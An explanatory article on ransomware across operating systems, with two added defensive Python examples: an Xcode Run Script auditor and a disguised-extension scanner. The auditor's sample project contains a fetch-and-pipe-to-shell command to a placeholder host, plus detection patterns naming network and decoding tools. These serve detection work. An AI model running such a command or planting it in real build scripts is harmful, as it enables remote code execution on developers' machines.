
Ransomware by Operating System

How does ransomware affect different operating systems? Linux, macOS, Android, Windows, etc.?

How Does Ransomware Affect Different Operating Systems?

Because a successful infection has such potential to be lucrative, no modern operating system is immune to the threat of ransomware. With the cost of ransomware expected to be $265 billion globally by 2031, it’s essential to know how ransomware affects different operating systems so you can take steps to protect yourself.

Ransomware on Linux

Linux and Unix operating systems are widely used for public web servers as well as for the internal servers that run government and corporate networks. As a result, ransomware on Linux has the potential to affect many high-value targets.
Desktop computers running Linux can become infected with ransomware the same way that desktops running macOS or Windows get infected: primarily through email or corrupted websites. Servers running Linux can be vulnerable because of inexperienced or untrained system administrators, unpatched software, stolen credentials, and misconfiguration.
Whether on a server or desktop, computers running Linux tend to be less automated than macOS or Windows. Linux is multi-user, and it’s common for a single Linux server to have hundreds of user accounts. Each account must be correctly configured for the operating system to be secure.
Because of the complexity of administration and the need for frequent patches to the thousands of software packages that make up a Linux distribution, the most common entry point for ransomware on Linux is through an unpatched package or misconfigured permissions. Web servers running out-of-date versions of popular content management or blogging tools such as Drupal or WordPress can also be exploited to install and spread ransomware.
Although Linux isolates user accounts, ransomware may possess privilege escalation capabilities, which can allow it to access and encrypt data across the entire operating system or the entire network.
The open source and free software ethos that produced Linux means that sys admins typically share information about new ransomware. But this openness has also directly contributed to one of the worst ransomware attacks on the operating system. In August 2015, a security group published ransomware code, specifying that it was for educational purposes only. It didn’t take long, however, for criminals to ignore this warning. Ransomware based on the open source “Hidden Tear” code infected more than 600 servers worldwide.
One of the most common ransomware attacks on Linux systems is RansomEXX (also known as Defray777). The list of high-profile RansomEXX attacks includes the Brazilian government, the Texas Department of Transportation, and Konica Minolta.

Ransomware on macOS

The first ransomware—known as KeRanger—on macOS appeared in 2016 (back when the operating system was still called OS X). Today, ransomware on macOS is a serious and growing problem.

This is despite the common belief that macOS is less vulnerable to infection than Windows or Linux. While it may be true that Apple’s control over every aspect of its hardware and operating systems makes macOS inherently more secure, the relative lack of malware and ransomware on macOS to date can largely be attributed to the much smaller market share of macOS vs. Windows PCs.

With macOS representing less than 20% of the market (vs. 75% for Windows), a ransomware attack against macOS is simply less likely to be as profitable. As a result, fewer ransomware software packages have been developed and discovered that are macOS-specific.

Most ransomware on macOS to date has resulted from users installing pirated software that’s been modified to covertly install the malicious software. ThiefQuest (also known as EvilQuest), first detected on macOS in summer of 2020, was packaged with pirated versions of popular software, including the Little Snitch security software, Mixed In Key DJ software, and the music production software Ableton. ThiefQuest includes both spyware and ransomware.

Besides showing the user a ransom note that demands payment, it also logs the user’s keystrokes, searches the infected host for passwords and cryptocurrency wallet data, and gives the attackers a back door to the host computer.

Malware has also been found in macOS Xcode developer tools. For example, XcodeSpy disguises itself as Xcode’s Run Script functionality. When unknowingly run by a developer building their own software project, it installs a back door on the computer that can be used for command and control of the operating system.

What makes this flavor of malware so dangerous is that it can execute what’s known as a “supply chain attack” by spreading through shared projects in public code repositories and potentially infecting every software application that uses the shared code.
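One way to review a shared project before building it is to list every Run Script build phase and read what it executes. The following is an added example, not code from the original page; the sample project fragment is constructed, and the indicator patterns are assumed heuristics that do not reflect any specific malware sample.

```python
import re

# Constructed project.pbxproj fragment for illustration (not from a real project).
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA0000000000000000000001 /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			name = Lint;
			shellPath = /bin/sh;
			shellScript = "swiftlint lint --quiet\n";
		};
		AA0000000000000000000002 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Run Script";
			shellPath = /bin/sh;
			shellScript = "echo \"building\"\ncurl -s https://example.invalid/setup | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

ISA_RE = re.compile(r'isa = PBXShellScriptBuildPhase;')
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.S)
NAME_RE = re.compile(r'name = (?:"((?:[^"\\]|\\.)*)"|([^;"]+));')
ESCAPES = {'n': '\n', 't': '\t', '"': '"', '\\': '\\'}
# Heuristic indicators (assumed for this example; tune for your code base).
INDICATORS = {
    'network fetch': re.compile(r'\b(curl|wget|nc|ncat)\b'),
    'pipe to shell': re.compile(r'\|\s*(ba|z)?sh\b'),
    'decode or eval': re.compile(r'\bbase64\b|\beval\b'),
}

def unescape(s):
    """Undo the backslash escapes used inside quoted pbxproj strings."""
    return re.sub(r'\\(.)', lambda m: ESCAPES.get(m.group(1), m.group(1)), s, flags=re.S)

def audit_run_scripts(pbxproj_text):
    """Return one record per Run Script phase with any indicators it matched."""
    results = []
    for isa in ISA_RE.finditer(pbxproj_text):
        script = SCRIPT_RE.search(pbxproj_text, isa.end())
        if not script:
            continue
        name = NAME_RE.search(pbxproj_text, isa.end(), script.start())
        label = (name.group(1) or name.group(2) or '').strip() if name else '(unnamed)'
        body = unescape(script.group(1))
        hits = [k for k, rx in INDICATORS.items() if rx.search(body)]
        results.append({'name': label, 'script': body, 'findings': hits})
    return results
```

A phase with no findings still deserves a read; the indicators only prioritize which scripts to look at first.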

So, if you think you’re safe from ransomware simply because you use a device running macOS, think again.

Ransomware on Windows

Ransomware on Windows PCs represents 91% of all ransomware reported by managed service providers (MSPs), according to data from Statista.com. The leading cause of ransomware infection on Windows PCs is phishing emails that trick users into opening attachments containing malicious code.
But ransomware can also get onto your Windows PC without you even having to open a file. “Drive-by downloading” happens when a user visits an infected website, and that website installs malware without the user’s knowledge.
As with ransomware on macOS and Linux, naïve or poorly trained users are the most common vector for infections that, once installed, can spread far beyond the host that was initially infected.
Malware authors can exploit several features of Windows to install ransomware on Windows PCs. Windows Script Host (WSH), used for automating tasks, is one such feature. The ability for users to log into their Windows PC as administrators by default is also a common cause of ransomware on a Windows PC.
A Windows administrator account is at greater risk of ransomware infection because the user can unknowingly run malware with administrator privileges on their machine. If a user is also a domain administrator on a network, they can run a malicious script with full access to the entire network.
Another feature that’s commonly exploited by ransomware authors is the fact that Windows hides file extensions by default. This allows a potentially harmful executable (.exe) file to disguise itself as a less suspicious-looking file type by appending another file extension to the filename, like README.txt.exe.
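The hidden-extension disguise can be checked for mechanically on a file share or mail attachment store. The following is an added example, not code from the original page: it flags names whose real extension is executable (including script types run by Windows Script Host) while the name shown with extensions hidden ends in a document or media type. The extension lists and sample names are assumptions constructed for the example.

```python
import os

# Types that execute on double-click: native, batch and HTA files, plus
# scripts handled by Windows Script Host (js/jse/vbs/vbe/wsf/wsh).
EXECUTABLE = {'exe', 'scr', 'com', 'pif', 'bat', 'cmd', 'hta',
              'js', 'jse', 'vbs', 'vbe', 'wsf', 'wsh'}
# Harmless-looking types used as the visible decoy (assumed list, extend as needed).
DECOY = {'txt', 'pdf', 'doc', 'docx', 'xls', 'xlsx', 'rtf', 'jpg', 'png', 'zip'}

def displayed_name(filename):
    """Name Explorer shows when extensions for known file types are hidden."""
    stem, dot, _ext = filename.rpartition('.')
    return stem if dot and stem else filename

def is_disguised(filename):
    """True when the real (last) extension is executable but the one a user
    sees with extensions hidden is a document or media type."""
    # Compare case-insensitively and tolerate stray whitespace around parts.
    parts = [p.strip().lower() for p in filename.split('.')]
    return len(parts) >= 3 and parts[-1] in EXECUTABLE and parts[-2] in DECOY

def scan_tree(root):
    """Walk a directory and report (path, name shown to user, real extension)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if is_disguised(name):
                real_ext = name.rpartition('.')[2].strip().lower()
                findings.append((os.path.join(dirpath, name),
                                 displayed_name(name), real_ext))
    return findings

# Constructed sample names; only the first and third should be flagged.
SAMPLE = ['README.txt.exe', 'report.v2.docx', 'Invoice.PDF.js', 'setup.exe']
FLAGGED = [n for n in SAMPLE if is_disguised(n)]
```

A plain `setup.exe` is deliberately not flagged: the check targets the mismatch between the visible and real type, not executables in general.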

Ransomware on Mobile Devices

With more business and personal computing being done on our phones than ever, ransomware on mobile devices is also increasing in frequency.


Unlike with desktop computers, however, most ransomware on Android and iOS doesn’t block access to files by encrypting them, but rather makes the entire mobile device unusable.


This type of ransomware is known as locker ransomware, or screenlockers. For example, the AndroidOS/MalLocker.B ransomware, once activated, displays a screen containing a ransom note over every other window.


Much ransomware on mobile devices is fake. A website or app may display a notification demanding payment, but the attackers have no ability to encrypt or disable the device. Clearing the browser cache and history usually returns the device to normal operation.


App stores provide a level of security on mobile operating systems that isn’t available on desktop and server operating systems. Apple has strict approval processes and security checks for apps, and only allows iOS apps downloaded from its app store to be installed.


Android gives users the ability to allow apps to be installed from any source. As a result, ransomware on Android is much more commonly spread through fake apps downloaded from third-party sites. One such example is the Koler ransomware, which was disguised as an adult-themed app that, when installed, gains control of the device and presents the user with a ransom demand.


Jailbreaking (on iOS) or rooting (on Android) is the process of modifying the operating system to allow the user to have administrator access. Once jailbroken or rooted, the user can install any third-party apps, which makes it much easier for ransomware to infect iOS, in particular.
